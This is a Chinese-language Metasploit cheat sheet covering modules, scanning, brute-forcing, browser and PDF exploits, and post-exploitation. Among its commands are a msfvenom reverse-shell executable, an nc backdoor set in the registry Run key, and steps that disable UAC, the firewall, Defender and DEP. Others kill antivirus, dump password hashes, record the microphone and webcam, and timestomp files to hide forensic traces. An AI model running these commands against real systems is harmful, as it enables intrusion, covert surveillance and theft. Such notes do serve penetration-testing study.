MSF笔记

全称:metasploit

0*01模块介绍

/usr/share/metasploit-framework/modules

auxiliary用于各种辅助功能 比如：信息收集、枚举、指纹探测、扫描

encoders编码模块，对payload进行加密

evasion

exploits漏洞利用脚本目录

nops维持payload稳定性

payloads

post

 

0*02简单使用

msfupdate更新

命令msfconsole最流行的使用方式

reload_all 手动添加模块后重新加载

msfconsole -q安静启动，不显示banner信息

-r

banner小贴士以及其他信息

color 关闭颜色提示

connect-h   相当于console界面的nc

show auxiliary/exploits/payloads/encoders/nops 显示模块的信息

search关键字 可以多条件搜索

use dos/windows/smb/ms09_001_write

　　show 选中模块后的命令 options/advanced...  edit

check 执行前检查漏洞利用back

 

0*03数据库

msfdb start  

service postgresql start

netstat -pantu | grep 5432检查服务

db_status

db_rebuild_cache 建立缓存，提高速度

db_nmap  hosts

 

0*04基本功能

每个模块下set /unset设置变量/取消变量  setg/unsetg设置全局/取消全局  save

run /exploit

jobs /kill 0

load/unload/loadpath  加载/卸载外部工具插件/加载自己开发的插件

show targets

session

　　session -l /-i  查看shell会话

route

irb

resource 指定资源文件  简化攻击模块配置  .rc文件是默认文件名

 

简单攻击：use 模块

show options 查看需要设置的项

set rhost  设置对方ip

set target 指定操作系统

set payload 路径/模块

 

set lhost 本地ip

exploit -j  注意防火墙

 

generate 生成payload

generate -b '\x00''\ff' 绕过坏字符

generate -s 10 生成的payload前面加10个字符实现一定绕过

generate -t python/java/c ... 以其他语言格式生成

 

0*05meterpreter

meterpreter 是一个更高级更隐蔽可扩展的payload

命令：

help  background从meter界面来回切换msf界面

cd  pwd  ls/dir  cat  mkdir/rmdir创建删除文件夹    常用linux文件命令都可以用

lpwd 显示linux当前工作目录

run/bgrun 正常/后台运行各种脚本模块等

clearev download 清除目标系统日志/从目标主机下载文件到攻击主机  eventvwr查看windows日志

　　upload /usr/share/window-bainares/nc.exe c:\\windows\\system32

execute -f **.exe -i -H 执行上传工具 -f指定程序 -i进行交互 -h隐藏

getuid /getsystem /get privs/getproxy/ getpid 查看用户账号/强势获取为sys/查看当前权限/查看渗透到目标系统生成的进程  ps查看进程 migrate port 更改进程

hashdump=runpost/windows/gather/hashdump 获取hashdump

sysinfo /ps/ kill-pid / reboot/ shutdown /shell

show_mount /search-f /autoexec.bat

arp /netstat/ ipconfig /route

idletime/ resource 查看目标操作系统空闲时间

record_mic /webcam_list /webcam_snap -i 1 -v false 记录麦克风声音/列出所有摄像头/每隔一秒拍照

 

0*06

信息收集

 

db_nmap -[s v n f ....] [ip]

search arp

　　use auxiliary/scanner/discovery/arp_sweep

　　set interface rhosts shost smac thread

search portscan

　　use auxiliary/scanne/portscan/syn

　　set interface rhosts shost smac thread

 

ldle扫描

　　use auxiliary/scanne/ip/ipidseq

　　set rhost ip

 

udp扫描

　　use auxiliary/scanner/discovery/udp_sweep

　　use auxiliary/scanner/discovery/udp_probe

 

密码嗅探

　　use auxiliary/sniffer/psnuffle

　　支持.cap文件 pop3 imap ftp http get协议

 

snmp扫描

　　vi /etc/default/snmpd #侦听地址0.0.0.0

　　use auxiliary/scanner/snmp/snmp_login

　　use auxiliary/scanner/snmp/snmp_enum

　　use auxiliary/scanner/snmp/snmp_enumusers

　　use auxiliary/scanner/snmp/snmp_enumshares

 

smb扫描

　　use auxiliary/scanner/smb/smb_version

　　use auxiliary/scanner/smb/pipe_auditor

　　use auxiliary/scanner/smb/pipe_dcerpc_auditor

　　use auxiliary/scanner/smb/smb_enumshares

　　use auxiliary/scanner/smb/smb_enumusers

　　use auxiliary/scanner/smb/smb_lookupsid

　　

ssh扫描

　　use auxiliary/scanner/ssh/ssh_version

　　use auxiliary/scanner/ssh/ssh_login 密码爆破

　　set userpass_file /usr/share/metasploit

　　/usr/share/metaspolit-framework/data/wordlists/root_userpass.txt

　　set verbose false

　　use auxiliary/scanner/ssh/ssh_login_pubkey公钥登陆

　　set key_file id rsa

　　set username root

　　

系统补丁

　　use post/windows/gather/enum_patches基于已经取得session

　　show advanced

　　set verbose yes

　　know bug in WMI query,try migrating to another process检查失败请迁移进程

　　get pid

　　ps

　　migrate [port]

　　

mssql扫描

　　tcp 1433/udp 1434

　　use auxiliary/scanner/mssql/mssql_ping

爆破mssql密码

　　use auxiliary/scanner/mssql/mssql_login

远程执行代码

　　use auxiliary/scanner/mssql/mssql_exec

　　set cmd net user user pass /add

　　

FTP版本扫描

　　use auxiliary/scanner/ftp/ftp_version

　　use auxiliary/scanner/ftp/anonymons

　　use auxiliary/scanner/ftp/ftp_login

use auxiliary/scanner/[tab]

-display all 479 possibilities?(y or n)

 

VNC密码破解

　　use auxiliary/scanner/vnc/vcn_login

VNC无密码访问

　　use auxiliary/scanner/vnc/vcn_none_auth

　　.supported；none.free access!成功

RDP远程桌面漏洞

　　use auxiliary/scanner/rdp/ms12_020_check

　　the target is vulnerable.-->search ms12-020 搜索利用

设备后门

　　use auxiliary/scanner/ssh/juniper_backdoor

　　use auxiliary/scanner/ssh/fortinet_backdoor

 

vmware esxi密码爆破

　　use auxiliary/scanner/vmware/vmauthd_login

　　use auxiliary/scanner/vmware/vmauthd_enum_vms

利用web api远程开启虚拟机

　　use auxiliary/scanner/vmware/poweron_vm

　　

0*07HTTP弱点扫描一

过期证书：use auxiliary/scanner/http/cert

显示目录及文件

　　use auxiliary/scanner/http/dir_listing

　　use auxiliary/scanner/http/files_dir

WebDAV Unicode编码身份验证绕过

　　use auxdiliary/scanner/http/dir_webdav_unicode_bypass

Tomcat管理登录

　　use aunalary/scanner/http/tomcat_mgr_login

基于HTTP方法的身份验证绕过

　　use auxliary/scanner/http:/verb_auth_bypass

- Wordpress密码爆破

　　use auxiliary/scanner/http/wordpress_login_enum

　　set URI /wordpress/wp-login.php

　　

WMAP WEB应用扫描器

根据 SQLMAP的工作方式开发

load wmap

wmap_sites -a http://1.1.1.1

wmap_sites -l 查看已经添加的站点

wmap_targets -t http://1.1.1.1/mutillidae/index.php 指定目标

wmap_ run -t 显示哪些具体模块

wmap_ run -e 具体执行哪些模块

wmap vulns -l 查看结果

vuIns

 

0*08HTTP弱点扫描二

load openvas

　　db_import ***.nbe  

msf调用nessus执行扫描

　　load nessus

　　nessus_help

　　nessus_connect admin:password@ip 连接

　　nessus_policy_list 查看配置策略

　　nessus_scan_new

　　nessus_report_list

　　

利用 Acrobat Reader漏洞执行 payload

　　构造PDF文件 exploit/windows/fileformat/ adobe_utilprint

　　构造恶意网站： exploit/windows/ /browser/ adobe_utilpri

　　Meterpreter

　　use pnv

　　run post/windows/capture/keylog_recorder

　　

利用Fash插件漏洞执行 payload

　　use exploit/multi/browser/adobe_flash_hacking_team_uaf

　　use exploit/multi/browser/adobe_flash_opaque_background_uaf

　　use auxiliary/server/browser_autopwn2

　　

利用浏览器漏洞执行 payload

use exploit/windows/browser/ms14_064_ole_code_execution

 

0*09后渗透测试

msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows LHOST=本机 LPORT=本地端口 -b "\x00" -e x86/shikata_ga_nai -i 7 -f exe -o a.exe

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

 

获取system  

getsystem  大多数失败,需要绕过UAC,以下需要先获得session

use exploit/windows/local/ask

use exploit/windows/local/bypassuac

use exploit/windows/local/bypassuac_injection 动态链接库dll注入或者理解为内存注入

 

利用漏洞直接获取system

use exploit/windows/local/ms13_053_schlamperei

use'exploit/windows/local/ms13_081_track_popup_menu

use exploit/windows/local/ms13_097_ie_registry_symlink

use exploit/windows/local/ppr_flatten_res

 

图形化 payload

set payload windows/vncinject/reverse_tcp

set viewonly no#可操作

hashdump

 

Psexec模块之 Passthehash

use exploit/windows/smb/sexes

set smbpass hash

需要提前关闭UAC

cmd.exe/k%windir%System32/reg.exe ADDHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System  /vEnableLUA/t REG_DWORD /d 0 /f

 

cmd.exe/k%windir%System32/reg.exe ADDHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /vLocalAccountTokenFilterPolicy/t REG_DWORD /d 1 /f

 

关闭防火墙(需要system权限)

netsh advfirewall set allprofiles state on/off

关闭windefend

net stop windefend

bitlocker磁盘加密

manage-bde -off C:

manage-bde -status C:

关闭dep

bcdedit.exe /set{current} nx AlwaysOff

杀死防病毒软件

run killav

run post/windows/manage/killav

开启远程桌面服务

run post/windows/manage/enable_rdp

run getgui-e

run getgui -u yuanfh -p pass

run multi_console_command -rc clean_up_20180824.1855.rc

查看远程桌面

screenshot

use espia

screengrab

 

用注册表添加NC后门服务( meterpreter)

-upload /usr/share/windows-binaries/nc. exe C:\\windowst\\system32

-reg enumkey -k 枚举当前主键下的启动

HKLM\\software\\microsoft\\windows\\currentversion\\run

 

-reg setval-k 

HKLM\\software\\microsoft\\windows\\currentversion\\run-v nc-d

'C:windows\system32\nc.exe Ldp 444-e cmd.exe'

-reg queryval-k

HKLM\\software\\microsoft\\windows\\currentversion\\Run-v nc

 

 

打开防火墙端口( meterpreter)

-execute -f cmd -i -H 隐蔽进桌面

-netsh firewall show opmode

-netsh firewall ad portopening TCP 4444 "test" ENABLE ALL

-shutdown -r -t 0

-nc 1.1.1.1 4444

 

 

抓包( meterpreter)

load sniffer

sniffer_interfaces 查看网卡接口

sniffer_start 2 使用网卡号

sniffer_dump 2 1. cap /sniffer- dump 2 1.cap

在内存中缓存区块循环存储抓包(50000包)，不写硬盘

智能过滤 meterpreter流量，传输全程使用 SSL/TLS加密

 

解包( meterpreter)

use auxiliary/sniffer/psnuffle

set PCAPFILE 1.cap

 

搜索文件( meterpreter)

-search -f *.ini

-search -d \\路径 -f *.*

 

john the ripper破解口令( meterpreter的system权限)

-use post/windows/gather/hashdump

-run 保存在/tmp目录

 

.文件系统访问会留下痕迹，电子取证重点关注

.渗透测试和攻击者往往希望销毁文件系统访问痕迹

.最好的避免被电子取证发现的方法：不要碰文件系统

-Meterpreter的先天优势所在(完全基于内存)

.MAC时间(Modified/Accessed/Changed)LINUX系统

- Is -I --time=atime/ctime 1.txt 默认是mtime

- stat 1.txt 列出mac时间

- touch -d "2 days ago" 1.txt 修改mac时间

- touch -t 1501010101 1.txt -年-月-日-时-分-秒

 

MACE ：MFT entry WINDOWS系统

-MFT：NTFS文件系统的主文件分配表 Master File Table

-通常1024字节或2个硬盘扇区，其中存放多项enty信息

-包含文件大量信息(大小名称目录位置磁盘位置创建日期)

-更多信息可研究文件系统取证分析技术

 

Timestomp( meterpreter)

-timestomp -v 1.txt 显示详细时间

-timestomp -f c:\\autoexec.bat 1.txt

-b -r擦除MACE时间信息，目前此参数功失效

-m/-a/-c/-e/-z

-timestomp- z MM/DD/YYYY HH24:MI:SS" 2.txt